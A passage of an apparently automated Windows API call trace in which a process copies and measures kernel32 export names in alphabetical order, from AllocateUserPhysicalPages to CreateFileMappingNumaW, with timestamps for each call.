lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.511] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.511] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.511] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.511] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.511] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.511] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.511] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.511] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.511] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.512] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.512] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.512] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.512] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.512] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.512] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.512] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.512] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.512] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.512] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.512] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.512] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.512] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.512] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.512] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.512] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.512] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.512] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.512] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.513] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.513] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.513] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.513] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.513] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.513] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.513] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.513] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.513] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.513] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.513] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.513] lstrlenA (lpString="BEEP") returned 4 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.513] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.513] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.513] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.513] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.513] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.513] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.513] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.513] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.514] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.514] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.514] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.514] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.514] lstrlenA (lpString="CANCELIO") returned 8 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.514] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.514] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.514] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.514] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.514] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.514] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.514] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.514] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.514] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.514] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.514] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.514] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.514] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.514] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.514] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.515] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.515] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.515] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.515] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.515] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.515] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.515] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.515] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.515] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.515] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.515] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.515] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.515] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.515] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.515] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.515] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.515] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.515] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.515] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.515] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.516] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.516] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.516] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.516] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.516] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.516] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.516] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.516] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.516] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.516] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.516] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.516] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.516] lstrlenA (lpString="COPYFILEA") returned 9 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.516] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.516] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.516] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.516] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.516] lstrlenA (lpString="COPYFILEW") returned 9 [0084.516] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.516] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.517] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.517] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.517] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.517] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.517] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.517] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.517] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.517] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.517] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.517] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.517] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.517] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.517] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.517] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.517] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.517] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.517] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.517] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.517] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.517] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.517] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.517] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.517] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.518] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.518] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.518] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.518] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.518] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.518] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.518] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.518] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.518] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.518] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.518] lstrcpyA (in: lpString1=0x3f2ccf4, 